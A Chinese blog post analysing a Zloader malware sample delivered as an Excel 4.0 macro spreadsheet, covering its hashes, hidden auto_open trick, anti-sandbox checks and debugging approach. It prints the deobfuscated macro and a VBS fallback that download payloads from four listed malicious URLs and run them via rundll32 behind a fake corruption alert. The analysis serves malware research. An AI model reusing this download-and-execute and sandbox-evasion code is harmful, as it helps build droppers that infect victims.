Zloader分析

最新推荐文章于 2024-04-24 10:36:18 发布
最新推荐文章于 2024-04-24 10:36:18 发布
阅读量516 收藏 1
点赞数
分类专栏: 样本分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39268483/article/details/108327854
版权

文章目录

Zloader分析报告

基本信息

样本基本信息

名称order_93.xls
样本类型xls
恶意类型加载器
样本MD5ea2a84383a2ef3bdcea801e0f22a0072
样本SHA1f74d0b4ac53ac4a9d898a77fb050328495b971f3

主要执行流程

样本启用excel4.0宏,进行一系列反沙箱行为之后,创建vbs下载并执行文件。

关键技术概览

  1. 代码被散乱在各个单元格之中
  2. auto_open属性被隐藏
  3. 利用了excel4.0宏代码
  4. 多种反沙箱,反调试技术
  5. 混淆对抗静态分析

在这里插入图片描述

详细分析

工具静态分析

程序利用了excel4.0宏,利用github上的开源项目xlmdeobfuscator,可以直接提取出宏代码。

在这里插入图片描述

动态调试

程序的宏代码散乱在各个单元格之中,加了很严重的混淆,且auto_open单元格被隐藏,否则可以在名称管理器 中找到auto_open

想要调试就必须要开启宏,开启宏就会执行auto_open单元格里面的内容。

这里有两种方法来调试

  1. 将auto_open单元格中的内容设置为halt(),此时宏已经暂停。再将原来的值复制回去,然后单步调试
  2. 修改auto_open属性,利用offvis,分析excel格式,如下路径中存放着lbl结构

在这里插入图片描述

lbl结构存放着特定的名称,其中fHidden标志位保留着是否在名称管理器中显示,

fbuiltin指定定义的名称是否表示内置名称

如果fBuiltin为0,则此字段必须满足与XLNameUnicodeString结构的name字段相同的限制。如果fBuiltin为1,则name字段用于内置名称

nameascii字段为0x01,对应着下表的auuto_open,因此需要将fbuiltin修改为0,auto_open功能失效

在这里插入图片描述

在这里插入图片描述

分析

IF(GET.WINDOW(7),GOTO(R33146C43),)//窗口不能隐藏
IF(GET.WINDOW(20),,GOTO(R33146C43))//窗口必须最大化
IF(GET.WINDOW(23)<3,GOTO(R33146C43),)//窗口不能最小化和restored
IF(GET.WORKSPACE(31),GOTO(R33146C43),)//宏是否执行单步运行
IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)//检测工作环境的宽
IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)//检测工作环境的高
IF(GET.WORKSPACE(19),,GOTO(R33146C43))//检测电脑是否存在鼠标
IF(GET.WORKSPACE(42),,GOTO(R33146C43))//检测电脑是否能播放声音
IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R33146C43))//检测是否在Windows环境中

首先进行了一系列沙箱检测

Files: path C:\Users\Public\FsWhHWf.vbs, access 3
On Error Resume Next
Set CAA = CreateObject("WScript.Shell")
Set cdtQbBq = CreateObject("Scripting.FileSystemObject")
Set zgVEMWV = cdtQbBq.CreateTextFile("C:\Users\Public\DC6PdmLB.txt", True)
zgVEMWV.WriteLine(CAA.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings"))
zgVEMWV.Close

创建了一个文件判断注册表HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings,

此注册表包含了启用宏通知设置,而启用如果包含字符为1,则一直设置为启用宏,而一般沙箱会有此效果,因此判断此处起到了反沙箱的作用

在这里插入图片描述

CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://wireborg.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
FILES("C:\Users\Public\lxlGZ4A.html")
IF(ISERROR(R38565C99),GOTO(R38572C99),)
    [TRUE] GOTO(R38572C99)
    CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-    keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
    FILES("C:\Users\Public\lxlGZ4A.html")
    IF(ISERROR(R38573C99),GOTO(R38580C99),)
        [TRUE] GOTO(R38580C99)
        CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-    keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
        FILES("C:\Users\Public\lxlGZ4A.html")
        IF(ISERROR(R38581C99),GOTO(R38588C99),)
            [TRUE] GOTO(R38588C99)
            CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
            ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")                   CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\lxlGZ4A.html,DllRegisterServer",0,5)

GOTO(R33146C43)
CLOSE(FALSE)

遍历这4个网址依次进行下载至"C:\Users\Public\lxlGZ4A.html每次下载都会对大小进行效验,如果大于40000,则会弹窗,且用rundll32.exe运行下载的文件

4个网址如下:

https://wireborg.com/wp-keys.php

http://zmedia.shwetech.com/wp-keys.php

https://datalibacbi.ml/wp-keys.php

https://procacardenla.ga/wp-keys.php

M1UW = "https://wireborg.com/wp-keys.php"
U4Uo = "http://zmedia.shwetech.com/wp-keys.php"
pqlyh = "https://datalibacbi.ml/wp-keys.php"
OeDOJy = "https://procacardenla.ga/wp-keys.php"
DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)
Dim OJxd: Set OJxd = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Function Uj8Ty(data):
OJxd.setOption(2) = 13056
OJxd.Open "GET", data, False
OJxd.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
OJxd.Send
Uj8Ty = OJxd.Status
End Function
For Each o37s4 in DcH
    If Uj8Ty(o37s4) = 200 Then
        Dim qjDgRsx: Set qjDgRsx = CreateObject("ADODB.Stream")
        qjDgRsx.Open
        qjDgRsx.Type = 1
        qjDgRsx.Write OJxd.ResponseBody
        qjDgRsx.SaveToFile "C:\Users\Public\ezNJJrCR.html", 2
        qjDgRsx.Close
Exit For

如果下载失败,则会创建如上的CiOnQpVy.vbs文件对4个url遍历下载到ezNJJrCR.html。

Set b7H = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
b7H.Document.Application.ShellExecute "rundll32.exe","C:\Users\Public\ezNJJrCR.html,DllRegisterServer","C:\Windows\System32",Null,0

启动下载的ezNJJrCR.html

playmak3r
关注
专栏目录
[系统安全] 四十九.恶意软件分析 (5)Cape沙箱分析结果Report报告的API序列批量提取详解
杨秀璋的专栏
04-11 3112
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文详细介绍Cape沙箱批量分析,通过调用Python脚本文件submit.py来实施批量处理。这篇文章将讲解如何将Cape沙箱分析结果Report报告的API序列批量提取,主要是提取Json文件的内容并存储至指定位置。基础性文章,希望对您有帮助,如果存在错误或不足之处,还请海涵。且看且珍惜!
[系统安全] 五十八.恶意软件分析 (10)利用火绒安全实现恶意样本家族批量标注(含学术探讨)
最新发布
杨秀璋的专栏
04-26 402
前文介绍了利用MS Defender实现恶意样本家族批量标注。这篇文章将讲解如何利用火绒实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
US倒角插件
08-28
ZLoader__RoundCorner.rb草图大师倒角工具,制作各类倒角,数据可调,操作简单su必备插件。
su插件大全 倒角
05-05
su插件大全 倒角等其他插件,有需要的可以联系我
TroubleShoot: Excel Services Fix - "The workbook cannot be opened".
05-12 267
1. 问题描述: 在SharePoint 2013文档库中打开Excel文件提示"The workbook cannot be opened"错误提示框,文档不能正常显示。 2、问题原因: 这个错误的原因应该是ExcelService的帐号对Content Database没有合适的访问权限。当你上传一个文档到文档库时,文档以blobs的形式保存在内容数据库中,再当你打...
The workbook can not be opened
anban6097的博客
10-01 499
最近在搭建sharepoint 2010中的Excel Service时,浏览上传的Excel文件时出现了”The workbook can not be opened”的错误, 后来检查系统日志发现了如下的错误信息: 从错误中发现是账号登录失败,检查spservice账号权限: 发现的确该账号对contoso_portalhome_content没有访问权...
SharePoint中excel file无法打开,弹出"The file is corrupted and cannot be opened"的解决方案
热门推荐
WarmSunshine7的博客
01-28 2万+
在SharePoint中打开excel文件时弹出下面错误信息“The File is corrupt and cannot be opened.” 本文主要介绍如何解决此问题。
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-18 458
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
[网络安全提高篇] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-24 364
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
PMON详解.docx
11-27
最后一行的“zloader.xxx”是指存在于源码根目录下的软链接,比如“zloader.ls1a”。这些软链接都指向同一个目录zloader,编译时会根据路径名使用不同的makefile。 第二部分:PMON的配置和编译 PMON的配置文件主要...
Microsoft Office Excel 不能访问文件 的解决办法
weixin_34205826的博客
03-22 1522
Microsoft Office Excel 不能访问文件“a.xls”。 可能的原因有: ? 文件名称或路径不存在。  ? 文件正被其他程序使用。  ? 您正要保存的工作簿与当前打开的工作簿同名 This solution is ... ?Windows 2008 Server x64    Please make this folder....
Server2008 R2 中拒绝访问 ProgID: "excel.application"及配置Microsoft Excel Application权限解决方案
kongwei521的专栏
06-26 4415
如果按照 http://blog.csdn.net/kongwei521/article/details/43699503 http://blog.csdn.net/kongwei521/article/details/43698667 两个链接里面都无法解决的话 采用终极办法 C:\Windows\SysWOW64\config\systemprofile\Desktop 64
Workbook 读取excel问题
laiwenqiang的专栏
10-30 5620
异常描述 Workbook读取excel,由于excel分为2003和2007,版本不匹配时,会出现如下异常: org.apache.poi.poifs.filesystem.OfficeXmlFileException: The supplied data appears to be in the Office 2007+ XML. You are calling the part of
easyexcel导出遇到的两个坑
冰魄神光
03-13 1万+
问题一:poi的jar版本过低问题 使用easyexcel大数据量导出时,需要依赖org.apache.poi的3.17版的jar包,而poi3.17与3.8/3.9版本之间方法变动比较大,会导致easyexcel不能正常使用。所以需要确保poi为3.17版本的 &lt;dependency&gt; &lt;groupId&gt;com.xxx&lt;/groupId&gt; ...
单龙芯3A3000-7A1000PMON研究学习-(12)撸起袖子干-分析代码前的准备工作1
嵌入式 arm 单片机 入门 视频 培训
07-21 324
1.make的过程我说了个大概,大家可以参考一下前面的文章。现在准备分析代码吧,其实这个准备工作内容应该蛮多的。可能后面还要补充。 2.首先找到关键的bin文件啊,就是可以最终下载到flash,能启动的镜像。(没更新过,但是还是得知道是更新谁吧) 官网上找,看了所有得更新方法,都是把gzrom.bin下载到flash中。那不用怀疑,就是它了。 3.其实我们得Makefile中已经有,而且是可以正确编译出这个bin文件的。 这就是我们最终需要的文件。由rom这个目标生成的。 ..
关于xloader和uboot的几个初级问题
Fe Tech
10-10 1万+
在看代码的过程中遇到的几个问题,发邮件问了xf,得到了满意的回答,对xf表示感谢。这里将问题及答案记录下来,作为参考,蓝色的字体为xf给我的回答。 一、为什么需要xloader,xloader所做的工作为什么不直接就让uboot做,而要单独的分出来呢?我看了xloader的代码,非常短小,所做的工作也很简单,我说说我对代码的理解,不知道正不正确:在最初始的时候xloader首先对系统进行了初始化(
龙芯开发(2)——Makefile分析
云醉月-楚狼
08-01 1600
暂且转载,后面有时间在验证是否如此! makefile分析: /pmon/loader.2fdev/Makefile:    用./getname获得开发板型号的Makefile: Makefile.2fdev /pmon/loader.2fdev/Makefile.2fdev:    说明开发板信息及Makefile TARGET=Bonito2fdev TARGETE
Dridex样本分析
playmaker的博客
10-07 7849
Dridex分析报告 基本信息 样本名称 INV_984748.xls 样本类型 excel 恶意类型 蠕虫远控 SHA256 7F8F24884E26B4B508D5147F8F54269E452D1200904323544EF36E30400190B1 样本名称 t9ak0.dll SHA256 076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab 主要执行流程 excel打开启动
AndLua加密解密
playmaker的博客
05-10 3925
进入关键函数Lua_loader_buffer首先判断第一个字符为= 之后根据base64解码表映射解密base64,其中将第一个字符替换为0x1d,即为0x1d+0x2b=H 解码base64后的结果如下所示 如果第一个字符为0x1c进行异或解密 最后再将第一个字符0x1c替换为0x78,进行inflate解码,解码完成后将第一个字符替换为28(0x1c) 解密算法如下 import base64 import base64 import zlib fp=open("main.lua","rb")
PMON源码解析与编译指南
"本文档详细介绍了PMON的详解,包括其目录结构、配置与编译过程,以及代码分析。PMON是一个嵌入式系统启动加载器,主要负责系统的初步初始化和引导任务。" PMON是一种微型操作系统监视器,用于嵌入式系统中,主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值